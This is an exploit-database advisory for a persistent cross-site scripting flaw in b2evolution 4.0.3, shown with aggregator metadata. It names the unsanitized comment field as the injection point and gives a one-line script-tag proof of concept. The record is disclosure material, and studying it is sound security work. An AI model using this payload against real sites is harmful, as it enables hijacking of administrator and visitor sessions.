b2evolution 4.0.3 Persistent XSS Vulnerability

2011-03-17T00:00:00

Description

Exploit for php platform in category web applications

{"id": "1337DAY-ID-15628", "type": "zdt", "bulletinFamily": "exploit", "title": "b2evolution 4.0.3 Persistent XSS Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2011-03-17T00:00:00", "modified": "2011-03-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/15628", "reporter": "AutoSec Tools", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-08T23:43:15", "viewCount": 7, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://0day.today/exploit/15628", "sourceData": "------------------------------------------------------------------------\r\nSoftware................b2evolution 4.0.3\r\nVulnerability...........Persistent Cross-site Scripting\r\nThreat Level............Moderate (2/5)\r\nDownload................http://b2evolution.net/\r\nVendor Contact Date.....3/15/2011\r\nDisclosure Date.........3/15/2011\r\nTested On...............Windows Vista + XAMPP\r\n------------------------------------------------------------------------\r\nAuthor..................AutoSec Tools\r\nSite....................http://www.autosectools.com/\r\nEmail...................John Leitch <[email\u00a0protected]>\r\n------------------------------------------------------------------------\r\n \r\n \r\n--Description--\r\n \r\nA persistent cross-site scripting vulnerability in b2evolution 4.0.3\r\ncan be exploited to execute arbitrary JavaScript.\r\n \r\n \r\n--Exploit--\r\n \r\nData submitted to the \"Comment text\" input of the blog comment form is\r\nnot properly santized. As a result, javascript can be executed\r\nthroughout the application (admin dashboard, admin comment full text\r\nview, possibly other pages).\r\n \r\n \r\n--PoC--\r\n \r\n<?<a><script>alert(0)</script>\r\n\r\n\n\n# 0day.today [2018-04-08] #", "_state": {"dependencies": 1645382083, "score": 1659766679, "epss": 1678811959}}